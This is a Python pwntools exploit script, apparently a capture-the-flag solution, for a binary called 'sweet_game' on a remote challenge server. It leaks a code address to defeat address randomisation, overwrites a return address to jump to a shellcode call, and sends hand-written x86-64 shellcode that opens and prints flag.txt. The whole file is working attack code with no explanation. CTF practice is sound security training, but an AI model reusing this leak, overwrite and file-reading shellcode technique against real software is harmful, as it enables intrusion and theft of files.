47 lines
822 B
Python
47 lines
822 B
Python
#!/usr/bin/python3
|
|
|
|
from pwn import *
|
|
|
|
context.binary = target = ELF("./sweet_game", checksec=False)
|
|
# r = process()
|
|
r = remote("challenge.bugpwn.com", 1001)
|
|
|
|
offset = 48
|
|
|
|
# leak
|
|
buf = b"A"*66
|
|
r.sendafter(b": ", buf)
|
|
r.recvuntil(b"A"*66)
|
|
main = u64(r.recv(6).ljust(8, b"\x00"))
|
|
log.info("main: 0x%lx", main)
|
|
elf_base = main - 0x15bc
|
|
log.info("elf_base: 0x%lx", elf_base)
|
|
call_shellcode = elf_base + 0x16d2
|
|
log.info("call_shellcode: 0x%lx", call_shellcode)
|
|
|
|
# jump
|
|
buf = b"A"*offset
|
|
buf += p64(call_shellcode)
|
|
r.sendlineafter(b": ", buf)
|
|
|
|
# openat + sendfile
|
|
shellcode="""
|
|
lea rsi, [rdx+37]
|
|
mov edi, -100
|
|
cqo
|
|
xor r10, r10
|
|
add ax, 257
|
|
syscall
|
|
xor rsi, rsi
|
|
mov rsi, rax
|
|
mov al, 40
|
|
shr edi, 255
|
|
add r10b, 255
|
|
syscall
|
|
"""
|
|
shellcode = asm(shellcode)
|
|
shellcode += b"flag.txt\0"
|
|
r.sendlineafter(b": ", shellcode)
|
|
|
|
r.interactive()
|